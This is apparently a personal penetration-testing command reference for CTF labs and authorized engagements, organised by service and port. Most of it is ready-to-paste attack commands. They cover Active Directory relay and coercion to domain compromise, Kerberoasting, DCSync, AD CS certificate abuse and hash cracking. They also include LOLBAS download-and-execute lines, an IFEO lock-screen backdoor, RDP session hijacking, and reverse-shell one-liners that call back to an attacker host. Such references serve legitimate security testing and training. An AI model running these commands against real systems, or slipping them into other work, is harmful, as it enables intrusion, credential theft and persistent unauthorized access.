hacktheplanet — CTF / HTB / authorized-engagement command reference
==========================================================================
Command-first field reference: copy-paste syntax, per service / per port. The
phase -> ATT&CK -> tool MAP is OFFENSIVE-METHODOLOGY.md; the working METHOD (the
recon loop, the unsticking playbook) is ~/ippsec (`ipp`); the blue-team mirror
(detections + event IDs) is PURPLE-TEAM.md.

Folds in vim/neovim (modeline at the bottom wires it): `za` toggle a fold, `zM`
close all, `zR` open all.

SCOPE: authorized engagements (written ROE + scope) or your own CTF/HTB labs ONLY.
Engagement DATA lives in ~/engagements (`mkengagement`), never in this repo.

Target fill — set your box once, then every <placeholder> is real. vim macro:
    mx
    :%s,<ip_address>,10.10.10.10,g
    :%s,<hostname>,box.htb,g
    :%s,<domain>,corp.local,g
    'x
  TARGET ids worth the macro:  <ip_address> <hostname> <domain> <user> <password>
  inline one-offs:  <your-ip> (YOUR listener IP, never the target) <port> <NThash> <share> <rid>/<sid>


Scanning
++++++++++++++++++++++++++++++++++++++++
# Quick+thorough TCP, then targeted. (`nmapsweep` wraps #1.)
sudo nmap -sC -sV -oA <hostname>_1-initial <ip_address>
sudo nmap -sC -sV -sU -oA <hostname>_2-udp <ip_address>
sudo nmap -p- -T4 --min-rate 10000 -oA <hostname>_3-tcp-discovery <ip_address>
sudo nmap -A -p <ports> -oA <hostname>_4-tcp-full-scan <ip_address>   # <ports> from the discovery scan

# Faster port discovery when -p- drags:
rustscan -a <ip_address> --ulimit 5000 -- -sC -sV
masscan -p1-65535 <ip_address> --rate 10000 -oL masscan.txt

# Run -p- in a 2nd terminal so it never blocks the scripted scan; stagger to avoid collisions:
sleep 300 && sudo nmap -p- --min-rate 10000 -oA <hostname>_3-tcp-discovery <ip_address>
# UDP leaks creds — SNMP(161)/DNS(53)/TFTP(69). Stuck? unsticking playbook → ~/ippsec.

echo "<ip_address> <hostname> <domain>" | sudo tee -a /etc/hosts   # so vhosts/Kerberos resolve
////////////////////////////////////////


OSINT / external recon & user enumeration
++++++++++++++++++++++++++++++++++++++++
dig @<dns-server> <domain> NS
dig @<dns-server> <domain> MX
dig @<dns-server> <domain> TXT                # often leaks SPF (who may send the org's mail)
subfinder -d <domain> -silent | httpx -ip -asn -title -tech-detect -server -status-code
nuclei -u <domain> -t dns
# Google dorks (exploit-db.com/google-hacking-database) — one query per line:
#   site:<domain> "internal use only"      site:<domain> filetype:xls
#   site:<domain> inurl:"index of"         site:<domain> login|portal|admin|upload
# Names/emails -> usernames: hunter.io, dehashed.com, WeakestLink (LinkedIn scrape).

# --- Microsoft 365 / Entra ID (external, unauth) ---
# managed vs federated changes everything — realm XML:
#   https://login.microsoftonline.com/getuserrealm.srf?login=<user>@<domain>&xml=1
Invoke-AADIntReconAsOutsider -Domain <domain> | Format-Table   # AADInternals: federation/MDI/domains
./onedrive_enum.py -U users.txt -d <domain>                    # validate users via OneDrive
# TeamFiltration enum+spray — every request counts toward lockout, go low & slow:
#   --enum --validate-teams --usernames users.txt
#   --spray --passwords pw.txt --sleep-min 60 --sleep-max 80 --shuffle-users --jitter 150
# Log retention scales w/ license: E5/G5 1yr + MailItemsAccessed/Send; E3 90d & thinner.
////////////////////////////////////////


Web enumeration / HTTP(S) — TCP 80/443/8080/8443
++++++++++++++++++++++++++++++++++++++++
whatweb http://<ip_address>
curl -sI http://<ip_address>            # headers
curl -s http://<ip_address>/robots.txt

# Directory / file brute force:
feroxbuster -u http://<ip_address> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt,html
ffuf -u http://<ip_address>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic
gobuster dir -u http://<ip_address> -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,txt,html

# vhost / subdomain fuzz — set -fs to the baseline size to kill the wildcard match:
ffuf -u http://<ip_address> -H "Host: FUZZ.<domain>" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs <baseline-size>
gobuster vhost -u http://<domain> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain

# Scanners:
nikto -h http://<ip_address>
nuclei -u http://<ip_address>
wpscan --url http://<ip_address> --enumerate u,vp,vt   # WordPress

# SQLi — capture a request to req.txt (Burp), then:
sqlmap -r req.txt --batch --dbs
sqlmap -u "http://<ip_address>/page.php?id=1" --batch --dump
////////////////////////////////////////


FTP — TCP 21
++++++++++++++++++++++++++++++++++++++++
nmap -p21 -sCV --script=ftp-anon,ftp-bounce,ftp-syst <ip_address>
ftp <ip_address>            # try anonymous / anonymous
wget -m --no-passive ftp://anonymous:anonymous@<ip_address>   # mirror an open server
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://<ip_address>
////////////////////////////////////////


SSH — TCP 22
++++++++++++++++++++++++++++++++++++++++
nmap -p22 -sCV <ip_address>
ssh-audit <ip_address>
ssh <user>@<ip_address>
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<ip_address>
chmod 600 id_rsa && ssh -i id_rsa <user>@<ip_address>        # found a key? lock perms or ssh refuses it
ssh2john id_rsa > id_rsa.hash && john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
////////////////////////////////////////


SMTP — TCP 25
++++++++++++++++++++++++++++++++++++++++
nmap -p25 --script smtp-commands,smtp-enum-users,smtp-open-relay <ip_address>
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t <ip_address>
nc -nv <ip_address> 25       # manual: VRFY root / EXPN / RCPT TO
////////////////////////////////////////


DNS — TCP/UDP 53
++++++++++++++++++++++++++++++++++++++++
dig axfr @<ip_address> <domain>           # zone transfer
dnsenum --dnsserver <ip_address> <domain>
nslookup -> server <ip_address> -> set q=any -> <domain>
gobuster dns -d <domain> -r <ip_address> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
////////////////////////////////////////


SNMP — UDP 161
++++++++++++++++++++++++++++++++++++++++
nmap -sU -p161 --script snmp-info <ip_address>
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <ip_address>   # find community string
snmpwalk -v2c -c public <ip_address>
snmpbulkwalk -v2c -c public <ip_address> .1   # faster full walk
snmp-check <ip_address> -c public
////////////////////////////////////////


NFS — TCP 111/2049
++++++++++++++++++++++++++++++++++++++++
nmap -p111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <ip_address>
showmount -e <ip_address>
sudo mount -t nfs <ip_address>:/<share> /mnt -o nolock
# no_root_squash? become the file owner locally (e.g. uid 1000) to read/plant.
////////////////////////////////////////


Databases — MySQL 3306 / MSSQL 1433 / PostgreSQL 5432 / Redis 6379
++++++++++++++++++++++++++++++++++++++++
mysql -h <ip_address> -u root -p
psql -h <ip_address> -U postgres
nxc mssql <ip_address> -u <user> -p <password> --local-auth
impacket-mssqlclient <domain>/<user>:<password>@<ip_address> -windows-auth
redis-cli -h <ip_address>        # then: INFO / KEYS * / CONFIG GET dir
////////////////////////////////////////


Working with public exploits — searchsploit & fixups
++++++++++++++++++++++++++++++++++++++++
# READ before running — PoCs are mislabeled, build-specific, occasionally booby-trapped.
searchsploit <product> <version>
searchsploit -x <id|path>        # examine source
searchsploit -m <id|path>        # mirror into cwd
searchsploit -u                  # update local db
# Almost always must edit:  1) offset/retaddr for the EXACT build  2) regen shellcode vs bad-chars
#                           3) LHOST/LPORT/target IP/hardcoded URLs+paths
msfvenom -p windows/shell_reverse_tcp LHOST=<your-ip> LPORT=9001 -b '\x00\x0a\x0d' -f python -v shellcode
# Cross-compile — Windows target (mingw) / old 32-bit Linux PoC:
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
gcc -m32 -fno-stack-protector -z execstack exploit.c -o exploit
gcc -m32 -Wl,--hash-style=both exploit.c -o exploit     # won't build? add -static if libs missing
# Crash in a CUSTOM binary -> shell? that workflow is ~/exploitdev (`xdev`).
////////////////////////////////////////


Windows Enumeration
++++++++++++++++++++++++++++++++++++++++
# Cross-protocol sweep — nxc (NetExec, CrackMapExec's maintained successor):
nxc smb   <ip_address> -u <user> -p <password>            # add --shares --users --pass-pol
nxc ldap  <ip_address> -u <user> -p <password>
nxc winrm <ip_address> -u <user> -p <password>
////////////////////////////////////////


Microsoft Windows Kerberos — TCP 88
++++++++++++++++++++++++++++++++++++++++
nmap -p88 --open --script=krb5-enum-users -Pn -oA Kerberos <ip_address>

# User enum (no creds) + AS-REP roast (no-preauth accounts):
kerbrute userenum -d <domain> --dc <ip_address> /usr/share/seclists/Usernames/Names/names.txt
impacket-GetNPUsers <domain>/ -dc-ip <ip_address> -usersfile users.txt -no-pass
nxc ldap <ip_address> -u <user> -p <password> --asreproast asrep.txt

# Kerberoast (needs valid creds) -> crack offline:
impacket-GetUserSPNs -request -dc-ip <ip_address> <domain>/<user>
nxc ldap <ip_address> -u <user> -p <password> --kerberoasting kerb.txt

kerbrute passwordspray -d <domain> --dc <ip_address> users.txt '<password>'   # mind lockout policy

# DCSync once you have DA / replication rights:
impacket-secretsdump <domain>/Administrator:<password>@<ip_address>
impacket-secretsdump -just-dc <domain>/Administrator:<password>@<ip_address>
////////////////////////////////////////


Microsoft Windows RPC — TCP 135
++++++++++++++++++++++++++++++++++++++++
impacket-rpcdump <ip_address>
impacket-samrdump <ip_address>

nmap -sV --script msrpc-enum -Pn <ip_address>
nmap -p135 --script=msrpc-dcom-interface-activation <ip_address>

rpcclient -U "" -N <ip_address>
    srvinfo
    querydominfo
    enumdomusers
    enumdomgroups
    queryuser <rid>
    querygroup <rid>
    lookupnames <name>
    lookupsids <sid>
    createdomuser / deletedomuser
    lsaaddacctrights / lsaremoveacctrights
    dsroledominfo
    dsenumdomtrusts

impacket-lookupsid anonymous@<ip_address>   # RID cycling -> user list
////////////////////////////////////////


Netbios-ssn / Microsoft-ds — TCP 139/445 (SMB)
++++++++++++++++++++++++++++++++++++++++
nmap -n -v -Pn -p139,445 -sV <ip_address>
nmap <ip_address> --script=smb-enum-shares,smb-enum-users,smb-os-discovery
nmap <ip_address> --script=smb-vuln*

# List + browse shares (--option dance is for old SMBv1 boxes):
smbclient -L //<ip_address>/ -N
smbclient -L //<ip_address> --option='client min protocol=NT1'
smbclient //<ip_address>/<share> -N -c 'recurse;ls'
smbclient //<ip_address>/C$ -U <user>

smbmap -H <ip_address>
smbmap -u guest -p '' -H <ip_address>
smbmap -u <user> -p <password> -d <domain> -H <ip_address> -R <share>

enum4linux-ng -A <ip_address>            # -ng is the maintained rewrite
nbtscan -r <ip_address>

# NetExec — users/shares/policy in one shot:
nxc smb <ip_address> -u '' -p '' --shares           # null session
nxc smb <ip_address> -u <user> -p <password> --users --groups --shares --pass-pol
nxc smb <ip_address> -u <user> -p <password> --loggedon-users
nxc smb <ip_address>/24 -u <user> -p <password>     # spray a cred across the subnet (reuse = bread & butter)
nxc smb <ip_address>    -u <user> -H <NThash>       # pass-the-hash

sudo mount -t cifs //<ip_address>/<share> /mnt -o username=<user>,password=<password>
////////////////////////////////////////


WinRM — TCP 5985/5986
++++++++++++++++++++++++++++++++++++++++
nxc winrm <ip_address> -u <user> -p <password>      # "(Pwn3d!)" => exec works
evil-winrm -i <ip_address> -u <user> -p <password>
evil-winrm -i <ip_address> -u <user> -H <NThash>    # pass-the-hash
////////////////////////////////////////


RDP — TCP 3389
++++++++++++++++++++++++++++++++++++++++
nxc rdp <ip_address> -u <user> -p <password>
xfreerdp /v:<ip_address> /u:<user> /p:<password> /cert:ignore /dynamic-resolution +clipboard
////////////////////////////////////////


Active Directory — attack paths
++++++++++++++++++++++++++++++++++++++++
# Map the domain (`bhce` wraps the CE-ready collection):
bhce <ip_address> <user> <password> <domain>
nxc ldap <ip_address> -u <user> -p <password> --bloodhound --collection All --dns-server <ip_address>
bloodhound-python -u <user> -p <password> -d <domain> -ns <ip_address> -c All

# Escalation primitives: AS-REP / Kerberoast (above) / unconstrained-deleg / GenericAll / DCSync.
certipy-ad find -u <user>@<domain> -p <password> -dc-ip <ip_address> -vulnerable  # AD CS (ESC1-16)
impacket-psexec <domain>/<user>@<ip_address> -hashes :<NThash>   # PtH / overpass-the-hash
nxc smb <ip_address> -u <user> -H <NThash> -x 'whoami'
////////////////////////////////////////


Poisoning & relay — Responder / ntlmrelayx
++++++++++++++++++++++++++++++++++++++++
nxc smb <ip_address>/24 --gen-relay-list relaytargets.txt    # targets w/o SMB signing
sudo responder -I <iface>                                    # poison LLMNR/NBT-NS/mDNS -> NetNTLMv2
sudo responder -I <iface> --disable-ess --lm                 # downgrade to NetNTLMv1 (shuckable, next fold)
# To RELAY not crack: set SMB=Off + HTTP=Off in Responder.conf (/etc/ or /usr/share/responder/) first, then:
impacket-ntlmrelayx -tf relaytargets.txt -smb2support              # relay in, dump SAM
impacket-ntlmrelayx -t smb://<ip_address> -smb2support -socks      # -socks keeps the session
proxychains nxc smb <ip_address>                                   # ride the relayed session
////////////////////////////////////////


Coercion -> relay -> domain compromise
++++++++++++++++++++++++++++++++++++++++
# Force a machine (ideally a DC) to auth to you, then relay it:
impacket-petitpotam <your-ip> <dc-ip>                       # MS-EFSRPC (EfsRpcOpenFileRaw)
printerbug.py <domain>/<user>:<password>@<dc-ip> <your-ip>  # MS-RPRN spooler (Dementor)
coercer coerce -t <dc-ip> -l <your-ip> -u <user> -p <password> -d <domain>   # many vectors
# Relay coerced DC auth to AD CS web enrollment -> DC cert (dirkjanm relay-to-ADCS):
impacket-ntlmrelayx -t http://<ca-host>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# DC cert -> DC NT hash via PKINIT, then DCSync:
python3 gettgtpkinit.py -cert-pem dc.crt -key-pem dc.key -dc-ip <dc-ip> <domain>/'DC$' dc.ccache
KRB5CCNAME=dc.ccache python3 getnthash.py -k <AS-REP-key> -dc-ip <dc-ip> <domain>/'DC$'
impacket-secretsdump -hashes :<NThash> <domain>/'DC$'@<dc-ip>

# NetNTLMv1 is fatal — a captured v1 response downgrades straight to the NT hash:
#   shuck via crack.sh / shuck.sh/get-shucking.php   (trustedsec.com/blog/practical-attacks-against-ntlmv1)
nxc smb <ip_address> -u '<computer>$' -H <NThash> -d <domain>   # auth as the machine acct (NetBIOS name + $)
////////////////////////////////////////


AD CS abuse — certipy (ESC1 shown)
++++++++++++++++++++++++++++++++++++++++
certipy-ad find -u <user>@<domain> -p <password> -dc-ip <dc-ip> -vulnerable -stdout
# ESC1 (template lets enrollee supply the subject) -> request a cert AS admin:
certipy-ad req -u <user>@<domain> -p <password> -ca <CA-name> -target <ca-host> \
    -template <vuln-template> -upn administrator@<domain>
certipy-ad auth -pfx administrator.pfx -dc-ip <dc-ip>       # cert -> TGT + NT hash
nxc smb <dc-ip> -u administrator -H <NThash> -d <domain>
////////////////////////////////////////


DCSync / NTDS dump (needs DA or replication rights)
++++++++++++++++++++++++++++++++++++++++
impacket-secretsdump <domain>/<user>:<password>@<dc-ip> -just-dc              # all domain hashes
impacket-secretsdump <domain>/<user>:<password>@<dc-ip> -just-dc-user krbtgt  # targeted (far quieter)
nxc smb <dc-ip> -u <user> -p <password> --ntds                               # same, via nxc
////////////////////////////////////////


Credential cracking — hashcat / john
++++++++++++++++++++++++++++++++++++++++
hashid '<hash>'          # or name-that-hash — ID the mode before you burn GPU
# Modes you actually meet (source):
#   1000  NTLM (NTDS)              3000  LM
#   5500  NetNTLMv1 (Responder)    5600  NetNTLMv2 (Responder)
#   13100 Kerberoast (TGS)         18200 AS-REP
#   2100  DCC2/MSCache2            3200  bcrypt        full: hashcat.net/wiki/doku.php?id=example_hashes

# Attack modes (-O = optimized kernel, faster; caps password length):
hashcat -m 1000 -O hashes.txt /usr/share/wordlists/rockyou.txt              # -a 0 dictionary
hashcat -m 13100 -O kerb.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule  # dict + RULES
hashcat -m 1000 -O hashes.txt -a 3 ?u?l?l?l?l?l?d?d                         # -a 3 mask / brute
hashcat -m 5500 -O hashes.txt -a 6 wordlist.txt ?d?d?d?d                    # -a 6 hybrid word+mask
# Rules mutate the list (apple -> @ppl3/apple123); stack for reach:
#   best64.rule (fast)  OneRuleToRuleThemAll  NSAKEY/nsa-rules  nyxgeek-rules

# TARGETED wordlists beat raw rockyou on corporate passwords:
exrex "(Winter|Spring|Summer|Fall|Autumn)20(1[7-9]|2[0-9])" > seasons.txt    # Season+Year (2017–2029)
cupp -i                                                                       # OSINT-driven (names/dates/pets)
kwp basechars/full.base keymaps/en-us.keymap routes/2-to-10-max-3-direction-changes.route > kwalks.txt
# PACK: profile a real dump's masks, then crack within this org's policy:
statsgen ntds.txt -o org.masks && maskgen org.masks --optindex -o org.hcmask
hashcat -m 1000 -O ntds.txt -a 3 org.hcmask
# hate_crack chains dict -> rules -> mask automatically.

sort -u -t: -k1,1 responder.hashes > unique.hashes     # dedupe Responder hashes to one/user
# Kerberoast triage — which cracked SPN users are privileged?
cut -d'$' -f4 spns.txt | cut -d'*' -f2 > spn_users.txt
grep -wi -f spn_users.txt group-membership.txt | grep -i 'admin\|vpn\|server'
////////////////////////////////////////


Linux privilege escalation
++++++++++++++++++++++++++++++++++++++++
./linpeas.sh | tee linpeas.out            # automated
sudo -l                              # NOPASSWD / runnable binaries -> GTFOBins
id; groups                           # interesting groups (docker, lxd, disk, adm)
find / -perm -4000 -type f 2>/dev/null     # SUID
getcap -r / 2>/dev/null                    # capabilities
cat /etc/crontab; ls -la /etc/cron.*       # writable cron jobs/scripts
uname -a; cat /etc/os-release              # kernel -> known exploit?
# GTFOBins = the lookup for any binary you can run as root / with a capability.
////////////////////////////////////////


Windows privilege escalation
++++++++++++++++++++++++++++++++++++++++
.\winPEASany.exe                     # automated
whoami /priv                         # SeImpersonate/SeAssignPrimaryToken -> Potato
whoami /groups
systeminfo                           # patch level -> known exploit
# PowerUp for service/registry/path misconfigs:
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<your-ip>/PowerUp.ps1'); Invoke-AllChecks"
# Also: unquoted service paths, AlwaysInstallElevated, stored creds (cmdkey /list).
////////////////////////////////////////


Lateral movement & remote execution
++++++++++++++++++++++++++++++++++++++++
nxc smb <ip_address> -u <user> -p <password> -x 'whoami'      # cmd  (-X = powershell)
nxc smb <ip_address> -u <user> -H <NThash> -M lsassy          # remote LSASS -> creds in memory
nxc smb <ip_address> -u <user> -p <password> --lsa            # LSA secrets
impacket-psexec <domain>/<user>@<ip_address> -hashes :<NThash>
evil-winrm -i <ip_address> -u <user> -H <NThash>
# Find a logged-on Domain Admin, then hijack their RDP session as SYSTEM:
nxc smb <ip_address>/24 -u <user> -p <password> -x quser
sc create hijack binpath= "cmd /k tscon <session-id> /dest:rdp-tcp#<n>" && net start hijack
# OPSEC: execute-assembly / BOFs run .NET without a child process -> no 4688 (see PURPLE-TEAM.md).
////////////////////////////////////////


LOLBAS — living-off-the-land Windows binaries
++++++++++++++++++++++++++++++++++++++++
# Signed MS binaries that download/exec for you (lolbas-project.github.io). Each still
# writes a 4688 (blue side hunts it). Beating AppLocker/AMSI/AV, not just running code? -> ~/evasion.
regsvr32 /s /n /u /i:http://<your-ip>/file.sct scrobj.dll
mshta http://<your-ip>/payload.hta
rundll32.exe shell32.dll,ShellExec_RunDLL "cmd.exe"
msbuild.exe \\<your-ip>\share\payload.xml
wmic process call create "calc.exe"
msiexec /q /i http://<your-ip>/evil.msi
installutil /logfile= /logtoconsole=false /u payload.dll
# Persistence (AUTHORIZED only) — IFEO debugger on osk.exe -> SYSTEM shell from the lock screen:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" \
    /v Debugger /t REG_SZ /d "cmd.exe"
////////////////////////////////////////


Reverse shells, stabilization, file transfer
++++++++++++++++++++++++++++++++++++++++
rlwrap nc -lvnp 9001                  # listener (`hethttp` = quick file server)
# Callbacks (set <your-ip>/<port>):
bash -i >& /dev/tcp/<your-ip>/9001 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<your-ip>",9001));[os.dup2(s.fileno(),f) for f in(0,1,2)];subprocess.call(["/bin/sh"])'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your-ip> LPORT=9001 -f exe -o shell.exe

# Stabilize a dumb shell — do it FIRST (`ttyup` prints this with your rows/cols filled):
python3 -c 'import pty;pty.spawn("/bin/bash")'   # 1) target  (or: script -qc /bin/bash /dev/null)
# 2) C-z   3) stty raw -echo; fg   4) <enter>
export TERM=xterm; stty rows <R> cols <C>        # 5) target — <R>/<C> from `stty -a` local
# Blind/awkward RCE (SSTI/injection/deser)? script a pseudo-shell, don't fight for a revshell:
#   ~/.config/kali/templates/pseudo-shell.py     # copy to exploit/, wire request+regex
# Firewalled both ways? forward shell (mkfifo /dev/shm | tail -f | sh).  Both: ~/ippsec (`ipp`).

# File transfer:
python3 -m http.server 8000                       # serve from attacker
#   target:  wget http://<your-ip>:8000/file  |  curl -O ...
#   windows: certutil -urlcache -f http://<your-ip>:8000/file file.exe
#   windows: powershell iwr http://<your-ip>:8000/file -OutFile file.exe
impacket-smbserver share . -smb2support           # SMB drop (great for Windows)
////////////////////////////////////////


Pivoting & tunneling
++++++++++++++++++++++++++++++++++++++++
ssh -L 8080:127.0.0.1:80 <user>@<ip_address>      # local forward
ssh -R 9001:127.0.0.1:9001 <user>@<ip_address>    # remote forward (callback)
ssh -D 1080 <user>@<ip_address>                   # dynamic SOCKS (+ proxychains)

chisel server -p 8000 --reverse                    # attacker
./chisel client <your-ip>:8000 R:socks             # target
# ligolo-ng (modern, tun-based): proxy on attacker, agent on target, then `session`
#   -> add a route to the internal subnet via the ligolo iface.
proxychains -q nxc smb <internal-ip>               # route tools through the SOCKS proxy
////////////////////////////////////////


Reference
++++++++++++++++++++++++++++++++++++++++
# Wordlists ($SECLISTS_DIR / $WORDLISTS_DIR in offensive.zsh):
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/                 # `seclists` alias jumps here
# GTFOBins  https://gtfobins.github.io          (Linux binary -> escalation)
# LOLBAS    https://lolbas-project.github.io     (Windows living-off-the-land)
# HackTricks https://book.hacktricks.xyz         (per-service deep dives)
# PayloadsAllTheThings                           (revshells, injections — many already in /usr/share)
#
# Companion references in this repo (different altitudes):
#   ~/ippsec      (`ipp`)   THE METHOD: recon loop, shell stabilization, pseudo-shell, unsticking playbook
#   ~/exploitdev  (`xdev`)  binary exploitation: BOF/SEH/egghunter/ROP
#   ~/evasion     (`evade`) AV/AMSI/AppLocker evasion, client-side, injection
#   OFFENSIVE-METHODOLOGY.md   the phase -> ATT&CK -> tool map
#   PURPLE-TEAM.md             the blue-team mirror (detections + event IDs per attack)
////////////////////////////////////////

# vim: set fdm=marker fmr=++++++++++++++++++++++++++++++++++++++++,//////////////////////////////////////// fdl=0 :
